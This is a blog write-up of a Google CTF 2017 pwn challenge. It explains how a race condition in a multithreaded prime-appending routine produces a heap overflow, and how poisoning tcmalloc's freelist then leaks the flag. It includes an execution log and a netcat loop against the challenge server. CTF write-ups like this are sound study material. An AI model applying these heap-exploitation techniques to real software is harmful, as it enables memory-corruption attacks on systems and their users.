Wednesday, June 21, 2017

[Write-up] Google CTF 2017 - pwn474 primary

Before We Start

This challenge took me 40 hours (including sleeping) to solve! One reason is that I'm not familiar with race condition bugs, but the main reason is that there seem to be too many strategies that could solve it. I tried at least four kinds of exploitation and finally got a correct and stable one. I will show the final solution I ended up with and mention why the other solutions failed.

Another reason this challenge is hard: race conditions are difficult to debug, because whenever a debugger is attached the race will always fail 😢

Basic Info



The challenge's attachment files can be found in my GitHub repo.

The source code, Makefile, and binary are given.
checksec of the binary:

The Makefile is important; it reveals the compile options:
$ clang-3.8 primary.c -Wall -Wextra -std=gnu11 -lpthread -O0 -o primary -ltcmalloc

It uses tcmalloc as the memory allocator, which is part of google-perftools. This link has a nice explanation of its malloc/free mechanism. I will briefly introduce it as well and explain how to exploit this kind of heap later.


Introduction

This section goes through what the binary does, for readers not yet familiar with this challenge. If you have already read the source code, you can skip to Vulnerability.


This is a prime examination service. The workflow is as follows:

  1. Input at most N = 256 x 4096 64-bit integers.
  2. Create N / 4096 threads; each thread processes 4096 integers.
  3. In each thread:
    1. Process 512 integers per round, so there are 4096/512 = 8 rounds.
    2. In each round, use the Miller-Rabin primality test to find the primes among these 512 numbers (a minimal sketch of the test appears below).
    3. Append the primes found to a global prime buffer.
  4. After all threads finish, show the prime numbers found.
And the flag has already been read into a global buffer, so we don't need RCE to solve this challenge.
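
For step 3.2, a minimal deterministic Miller-Rabin test for 64-bit integers looks roughly like the sketch below. This is my own illustration, not the code from primary.c:

/* Minimal deterministic Miller-Rabin for 64-bit integers (illustration only). */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

static uint64_t mulmod(uint64_t a, uint64_t b, uint64_t m) {
  return (uint64_t)((unsigned __int128)a * b % m);   /* needs a 64-bit compiler */
}

static uint64_t powmod(uint64_t a, uint64_t e, uint64_t m) {
  uint64_t r = 1;
  for (a %= m; e; e >>= 1) {
    if (e & 1) r = mulmod(r, a, m);
    a = mulmod(a, a, m);
  }
  return r;
}

static bool is_prime(uint64_t n) {
  static const uint64_t base[] = {2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37};
  if (n < 2) return false;
  for (size_t i = 0; i < 12; i++) {             /* small primes: exact answer   */
    if (n == base[i]) return true;
    if (n % base[i] == 0) return false;
  }
  uint64_t d = n - 1;
  int s = 0;
  while ((d & 1) == 0) { d >>= 1; s++; }        /* n - 1 = d * 2^s, d odd       */
  for (size_t i = 0; i < 12; i++) {             /* these 12 bases suffice < 2^64 */
    uint64_t x = powmod(base[i], d, n);
    if (x == 1 || x == n - 1) continue;
    bool witness = true;
    for (int r = 1; r < s && witness; r++) {
      x = mulmod(x, x, n);
      if (x == n - 1) witness = false;
    }
    if (witness) return false;                  /* base[i] proves n composite   */
  }
  return true;
}

int main(void) {
  printf("%d %d\n", is_prime(1000000007ULL), is_prime(1000000008ULL));  /* 1 0 */
  return 0;
}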

By the way, the last step contains a strange bug:
for (size_t i = 0; i < primes.count; i++) {
  printf("%zu ", primes.numbers[primes.count - 1]);
}
At first glance this code should print all the primes found, but it indexes primes.numbers[primes.count - 1] instead of primes.numbers[i]! So only the last prime is printed, count times.
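
For comparison, the loop that was presumably intended:
for (size_t i = 0; i < primes.count; i++) {
  printf("%zu ", primes.numbers[i]);
}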

Vulnerability

The main vulnerability is that there is no lock when appending primes to the global variable (well, it does lock things, but in the wrong way).

So threads can enter the append function simultaneously:
/*
typedef struct {
  size_t count;
  uint64_t* numbers;
} number_list;
*/
                                             // destination is a global variable
130:  void append(const number_list* source, number_list* destination) {
131:    size_t new_count = destination->count + source->count;
132:  
133:    if (source->count == 0 || new_count < destination->count)
134:      return;
135:  
136:    uint64_t* old_numbers = destination->numbers;
137:    destination->numbers = malloc(new_count * sizeof(uint64_t));
138:  
139:    if (destination->numbers == NULL)
140:      return;
141:  
142:    if (destination->count) {
143:      memcpy(destination->numbers, old_numbers,
144:             destination->count * sizeof(uint64_t));
145:      free(old_numbers);
146:    }
147:  
148:    memcpy(destination->numbers + destination->count, source->numbers,
149:           source->count * sizeof(uint64_t));
150:  
151:    destination->count = new_count;
152:  }

There are many ways to exploit this race condition. To avoid confusing readers, this section describes only the final solution I used; other potential solutions are discussed at the end of this write-up.

Race condition
At line 137 the global buffer pointer is reassigned, but the global count is not updated until line 151. This lets us 'cheat' threads about what the true buffer size is.

Now let's describe how to use three threads to create a heap overflow.

The overflow occurs at line 143:
143:    memcpy(destination->numbers, old_numbers,
144:           destination->count * sizeof(uint64_t));
If the value of destination->count has been changed by another thread, this memcpy will cause a heap overflow.


The details of the race strategy are shown below.
(Call the three threads A, B, and C.)

What happened                              | dest->count | dest->numbers
-------------------------------------------+-------------+--------------
A: malloc(a)                               | 0           | buf_a
A: finished                                | a           | buf_a
B: malloc(a+b)                             | a           | buf_ab
C: malloc(a+c)                             | a           | buf_ac
B: finished                                | a+b         | buf_ac
C: at line 143, memcpy(buf_ac, buf_ab, a+b)| a+c         | buf_ac

Thread C expects count to still be a, but thread B has already changed it to a+b.
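
To make the window concrete, below is a stripped-down model of the same pattern (my own sketch, not the challenge code; the usleep only widens the window so the demo triggers reliably). Thread C sizes its new buffer using the old count, but by the time it reaches the memcpy, thread B has already bumped the count.

/* Stripped-down model of the racy append(); illustration only, not the
 * challenge code. Build with something like: cc -O0 -pthread race_demo.c */
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

typedef struct { size_t count; uint64_t *numbers; } number_list;
static number_list dest = {0, NULL};

static void racy_append(const uint64_t *src, size_t n) {
  size_t new_count = dest.count + n;             /* count is read here...         */
  uint64_t *old = dest.numbers;
  dest.numbers = malloc(new_count * sizeof(uint64_t));
  usleep(10000);                                 /* widen the window for the demo */
  if (dest.count)
    /* ...but used again here: if another thread bumped dest.count in between,
       this copies more bytes than the new buffer was sized for, i.e. the heap
       overflow of line 143. (The original also frees old here, which enables
       the double free discussed near the end of this write-up.) */
    memcpy(dest.numbers, old, dest.count * sizeof(uint64_t));
  memcpy(dest.numbers + dest.count, src, n * sizeof(uint64_t));
  dest.count = new_count;                        /* count is only written here    */
}

static void *worker(void *arg) {
  uint64_t buf[64] = {0};
  racy_append(buf, (size_t)(uintptr_t)arg);
  return NULL;
}

int main(void) {
  uint64_t first[16] = {0};
  racy_append(first, 16);                        /* thread A: dest.count = a = 16 */
  pthread_t b, c;
  pthread_create(&b, NULL, worker, (void *)(uintptr_t)32);  /* B appends b = 32   */
  pthread_create(&c, NULL, worker, (void *)(uintptr_t)8);   /* C appends c = 8    */
  pthread_join(b, NULL);
  pthread_join(c, NULL);
  printf("dest.count = %zu\n", dest.count);      /* which value? depends on timing */
  return 0;
}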

TCMalloc

Now that we have a heap overflow, it's time to understand how tcmalloc works.

There's a global pool (central cache) and one local pool (thread cache) for each thread.

When a thread calls malloc, it will:

  1. Check whether the local pool has a chunk of the proper size to hand out.
  2. If not, allocate from the global pool (this always succeeds).
When a thread calls free:
  1. Put the freed address into the local pool.

It can't be simpler!


Sizes are rounded up (to size classes) when allocating. For example, all allocations in the range 1281 to 1408 bytes are rounded up to 1408 bytes. Each size class in a pool (both global and local) is a singly linked list.

One more thing: when a thread finishes, the memory in its local pool is returned to the global one. I didn't notice this mechanism, so for a while I was confused about why my exploit didn't work.
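
As a mental model, here is a toy version of those two pools for a single size class (purely illustrative, not real tcmalloc code; all names are made up):

/* Toy model of tcmalloc's two pools for one size class; illustration only. */
#include <stdio.h>

typedef struct chunk { struct chunk *next; char payload[120]; } chunk;

static chunk backing[8];                     /* storage for the demo            */
static chunk *central = NULL;                /* global pool (central cache)     */
static _Thread_local chunk *local = NULL;    /* local pool (thread cache)       */

static void push(chunk **list, chunk *c) { c->next = *list; *list = c; }
static chunk *pop(chunk **list) {
  chunk *c = *list;
  if (c) *list = c->next;
  return c;
}

static void *toy_malloc(void) {
  chunk *c = pop(&local);                    /* 1. try the thread cache first   */
  if (!c) c = pop(&central);                 /* 2. fall back to the central one */
  return c;
}

static void toy_free(void *p) {
  push(&local, (chunk *)p);                  /* free only touches the thread cache */
}

static void on_thread_exit(void) {           /* the thread cache drains back to */
  chunk *c;                                  /* the central cache on thread exit */
  while ((c = pop(&local)) != NULL)
    push(&central, c);
}

int main(void) {
  for (int i = 0; i < 8; i++)
    push(&central, &backing[i]);             /* pre-fill the central cache      */

  void *a = toy_malloc();                    /* served from the central cache   */
  toy_free(a);                               /* now sits in this thread's cache */
  void *b = toy_malloc();                    /* reused straight from the cache  */
  printf("a=%p b=%p (same chunk)\n", a, b);

  on_thread_exit();                          /* everything goes back to central */
  return 0;
}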

Exploitation

What remains is our favorite(?) heap exploitation... but with tcmalloc.

I have to say it's much easier than exploiting glibc's ptmalloc, although dealing with multiple threads always makes life harder.

We already have a heap overflow; with it we can overwrite the singly linked-list pointer of a free chunk, and tcmalloc will then hand us back the address we faked (just like fastbin corruption).

And the best news is that tcmalloc doesn't do any security checks, so any faked pointer does the magic.
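
Here is a toy demonstration of why that is enough (again just a model of the idea, not tcmalloc itself): a free chunk stores the list's next pointer in its own first 8 bytes, so an overflow into a freed neighbor lets us plant a fake next pointer, and the second allocation after that returns our chosen address.

/* Toy singly linked free list with "next" stored inside the freed chunk
 * itself -- the same idea as tcmalloc's size-class lists; illustration only. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static void *head = NULL;

static void toy_free(void *p) {              /* push: write next into the chunk */
  *(void **)p = head;
  head = p;
}

static void *toy_malloc(void) {              /* pop: follow the stored next     */
  void *p = head;
  if (p) head = *(void **)p;                 /* no sanity check whatsoever      */
  return p;
}

int main(void) {
  uint64_t freed_chunk[0x20] = {0};          /* pretend this chunk is on the list */
  uint64_t target[4] = {0};                  /* pretend this sits before &primes  */

  toy_free(freed_chunk);                     /* list: freed_chunk -> NULL         */

  /* the heap overflow overwrites the freed chunk's first 8 bytes,
   * i.e. its "next" pointer, with the address we want handed back    */
  void *fake = target;
  memcpy(freed_chunk, &fake, sizeof(fake));  /* list: freed_chunk -> target       */

  printf("1st malloc: %p (freed_chunk = %p)\n", toy_malloc(), (void *)freed_chunk);
  printf("2nd malloc: %p (target      = %p)\n", toy_malloc(), (void *)target);
  return 0;
}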

My exploitation strategy is to get an allocation at an address just before &primes and overwrite primes.numbers with a location near the flag. After all threads end, the binary prints out the content of the flag.

Visualization:
malloc here
|
V-------+---------------+----------------+------+
| ..... |  primes.count | primes.numbers | args |
+-------+---------------+----------------+------+
-----------------overwrite--------------->

Don't overwrite the mutex in args, otherwise some threads may deadlock.

The full exploitation uses five threads: three for creating the heap overflow and two for allocating the fake address.

The execution log:
$ ./primary.patch < payload
[A] malloc(0x500) = 0x1648000
[A] line 148: memcpy(0x1648000, <src>, 0x500)
[B] malloc(0x588) = 0x164c000
[B] line 143: memcpy(0x164c000, 0x1648000, 0x500)
[C] malloc(0x518) = 0x1650000
[B] free(0x1648000)
[B] line 148: memcpy(0x1650500, <src>, 0x88) // overflow but will be overwritten later
[C] line 143: memcpy(0x1650000, 0x164c000, 0x588) // overflow! set *0x1650580=FAKE_ADDR
[C] free(0x164c000)
[C] line 148: memcpy(0x1650588, <src>, 0x18) // another overflow but don't care
[D] malloc(0x520) = 0x1650580
[E] malloc(0x520) = FAKE_ADDR
...
[E] line 143: memcpy(FAKE_ADDR, 0x1650000, 0x518)
...
Note: This is not the only execution order that produces the overflow. Thread B and thread C can run in a different order and still end with the same overflow. That's why this exploitation has a relatively high probability of success.

Snapshot of my exploit script:

The variable 'fat' is a composite number that makes the primality test take a while; I use it to control the working order of the threads.

And remember the strange bug I mentioned? It only shows the last prime, so my exploitation can only leak 8 bytes of the flag at a time. In my final exploit script, I use ARGV to specify which part of the flag to leak.

This exploitation has a success rate of approximately 2%.

A big number appears when the race condition succeeds:
$ for i in {0..100}; do echo $i; nc primary.ctfcompetition.com < payload; done
....
44
7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 ...
45
8316293036412138595 8316293036412138595 8316293036412138595 ...
src/tcmalloc.cc:278] Attempt to free invalid pointer 0x300

Packing this large number reveals part of the flag:
In [210]: p64(8316293036412138595)
Out[210]: 'ctf{this'
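
Equivalently, in plain C (just to show that the decimal number is eight flag bytes read as a little-endian uint64_t):

#include <stdint.h>
#include <stdio.h>
#include <string.h>

int main(void) {
  uint64_t leaked = 8316293036412138595ULL;
  char text[9] = {0};
  memcpy(text, &leaked, 8);    /* little-endian byte order on x86 */
  printf("%s\n", text);        /* prints: ctf{this                */
  return 0;
}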

Full script is here

Other Exploitation And Discussion

Control rip
Notice that this challenge comes with a hint:
Hint: Maybe you don't need a full RCE? Are there any interesting addresses that influence control flow?

Yes, there is a backdoor in the binary: redirect rip to 0x401136 and it will print out the full flag.

You may wonder why I didn't use the common exploit strategy of overwriting the GOT to control rip. Well, I tried but failed; the difficulties I faced are listed below:

  1. The appended numbers are all primes, so the fake address we write has to be a prime value near the GOT. This constraint can be satisfied.
  2. 0x401136 is of course not a prime, but there is a way to write this value into the GOT. (Hint: 0x2f000000004011 and 0x3600000000000005 are primes.)
  3. To create the heap overflow, the allocated size has to be large enough, so we have to make sure all threads survive after we f**ked up almost the whole GOT.
  4. I finally bypassed all the constraints above, and then I saw this in my dmesg:

primary[30468]: segfault at 7ffff5e94ff8 ip 0000000000401150 sp 00007ffff5e95000 error 6 in primary[400000+2000]

It failed on the call to printf, because the thread couldn't push the return address onto the stack.
I didn't trace down why this happened, and since it didn't look like an easy issue to solve, I changed my strategy to one that doesn't control rip.

Another race condition

Let's see the source again:
136:    uint64_t* old_numbers = destination->numbers;
137:    destination->numbers = malloc(new_count * sizeof(uint64_t));
Imagine two threads reach line 136 simultaneously; they then hold the same old_numbers. Later, both threads will free this address, which leads to a double free. I used this double free to overwrite the GOT successfully, but with an extremely low probability, so I eventually dropped this exploitation.

To Debug
As I mentioned before, this challenge is hard to debug because ptrace affects the timing of context switches.

To debug, I inserted code to log the parameters of free/malloc/memcpy and printed the log only after all threads finished.
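
A rough sketch of the idea (the names here are made up, not my actual patch): record each call into a preallocated buffer through an atomic index, and dump everything only after the threads have joined.

/* Rough sketch of the logging idea (hypothetical names, not the actual patch). */
#include <stdatomic.h>
#include <stddef.h>
#include <stdio.h>

typedef struct { const char *what; void *dst; void *src; size_t n; } log_entry;

static log_entry log_buf[4096];
static atomic_size_t log_idx;

static void log_call(const char *what, void *dst, void *src, size_t n) {
  size_t i = atomic_fetch_add(&log_idx, 1);   /* atomic index: the logging itself */
  if (i < 4096)                               /* must not add yet another race    */
    log_buf[i] = (log_entry){what, dst, src, n};
}

static void dump_log(void) {                  /* call only after all pthread_join */
  size_t n = atomic_load(&log_idx);
  if (n > 4096) n = 4096;
  for (size_t i = 0; i < n; i++)
    printf("[%zu] %s(%p, %p, %#zx)\n", i, log_buf[i].what,
           log_buf[i].dst, log_buf[i].src, log_buf[i].n);
}

int main(void) {                              /* tiny usage example               */
  log_call("malloc", (void *)0x1648000, NULL, 0x500);
  log_call("memcpy", (void *)0x164c000, (void *)0x1648000, 0x500);
  dump_log();
  return 0;
}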

Just be careful not to introduce yet another race condition while doing this 😜

In addition, I patched the ret instruction into an infinite loop right before the threads end, so I could check whether tcmalloc's cache layout matched what I imagined.

Postscript
This challenge is great! It taught me how to deal with race condition bugs and how tcmalloc works. I'm always excited to solve challenges that make me grow 😆

Flag: ctf{this-problem-is-a-prime-example-of-race-conditions}
